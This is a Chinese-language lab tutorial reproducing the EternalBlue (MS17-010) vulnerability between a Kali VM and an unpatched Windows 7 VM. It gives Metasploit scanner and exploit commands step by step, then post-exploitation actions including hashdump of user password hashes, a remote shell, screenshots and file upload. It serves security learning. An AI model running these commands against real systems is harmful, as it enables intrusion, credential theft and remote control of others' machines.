目录
漏洞简介:
漏洞名称:“永恒之蓝”漏洞
漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148
漏洞类型:缓冲区溢出漏洞
微软已于2017 年 发布MS17-010补丁
漏洞复现:
实验环境:
靶机:Windows7(IP:192.168.81.132)
攻击机:kali linux(IP:192.168.81.133)
实验条件:两台虚拟机可以实现相互ping通,并且靶机(无补丁)开启了445端口,防火墙关闭。
复现过程:
1.使用MSF的永恒之蓝漏洞模块
打开kali,启动我们的Metasploit渗透工具
sudo msfconsole
search ms17-010 #搜索msf中和ms17-010漏洞有关的脚本
这里可以得到一些工具,其中
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,
exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
使用ms17-010的辅助性脚本
use auxiliary/scanner/smb/smb_ms17_010 #使用ms17-010的辅助模块
配置ms17-010的辅助性脚本
show options #查看有哪些项需要进行配置
set rhosts 192.168.81.132 #配置要攻击的靶机的ip地址
配置完成后,执行ms17-010的辅助性脚本
run #运行模块
使用ms17-010攻击性模块
use exploit/windows/smb/ms17_010_eternalblue #使用ms17-010的攻击模块
show options #查看配置项
设置被攻击机器ip
set rhosts 192.168.81.132 #设置被攻击机器ip
运行ms17-010攻击模块
run
成功建立会话后,可以做的事情很多。以下有部分举例
2.部分功能举例
(1)ipconfig #查看靶机网络配置
ifconfig #查看靶机网络配置\
(2)shell #直接给一个shell命令执行终端
exit #退出shell命令执行终端
注: 这里的乱码问题应该是msf的终端活动页与中文的不兼容导致的chcp 65001 可解决乱码问题。
(3)sysinfo #查看靶机信息
(4)hashdump #下载靶机用户的hash
(5)ps #查看靶机正在运行的进程
(6)screenshot #截图
(7)使用upload命令将Server应用程序上传到win7虚拟机C盘的Windows文件夹里